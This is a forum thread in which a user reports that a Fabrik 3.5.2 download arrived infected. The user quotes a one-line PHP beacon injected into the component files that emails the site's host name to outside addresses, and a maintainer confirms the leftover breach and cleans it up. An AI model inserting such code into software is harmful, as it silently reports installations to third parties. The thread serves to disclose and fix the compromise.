• Hello Fabrik Community

    Fabrik is now in the hands of the development team that brought you Fabrik for Joomla 4. We have recently transitioned the Fabrik site over to a new server and are busy trying to clean it up. We have upgraded the site to Joomla 4 and are running the latest version of Fabrik 4. We have also upgraded the Xenforo forum software to the latest version. Many of the widgets you might have been used to on the forum are no longer operational, many abandoned by the developers. We hope to bring back some of the important ones as we have time.

    Exciting times to be sure.

    The Fabrik 4.0 Official release is now available. In addition, the Fabrik codebase is now available in a public repository. See the notices about these in the announcements section

    We wish to shout out a very big Thank You to all of you who have made donations. They have really helped. But we can always use more...wink..wink..

    Also a big Thank You to those of you who have been assisting others in the forum. This takes a very big burden off of us as we work on bugs, the website and the future of Fabrik.

Download version 3.5.2 infected?

ronhon

New Member
Hi There,
I just upgraded my development environment to fabrik 3.5.2, downloaded from fabrikar.com/download.
After installation emails started to be sent. I found out that following code is placed at the top in administrator/components/com_fabrik/fabrik.php, administrator/components/com_fabrik/helpers/fabrik.php,
components/com_fabrik/fabrik.php:

<?php $to = 'albreto.st@gmail.com, blackswanr007@gmail.com';$subject = 'Hits ada lagi';$message = $_SERVER['HTTP_HOST'];$headers[] = 'From: Hidden Hits <auto@joss.com>';mail($to, $subject, $message, implode("\r\n", $headers));?>

Is it save to use this version after I remove the mailing code?

Thanks
 
Hmmm, I can't find anything in the 3.5.2 download.

Do you still have a copy of the ZIP you installed from?

-- hugh
 
I've cleaned it up. Looking at the date on that file, it was consistent with a breach earlier this year that we thought we'd completely cleaned up after, and that a number of other extension sites got hit with. I've checked all the other zips from 3.4 onwards, nothing else seems to be affected.

Thanks for reporting it.

-- hugh
 
We are in need of some funding.
More details.

Thank you.

Members online

Back
Top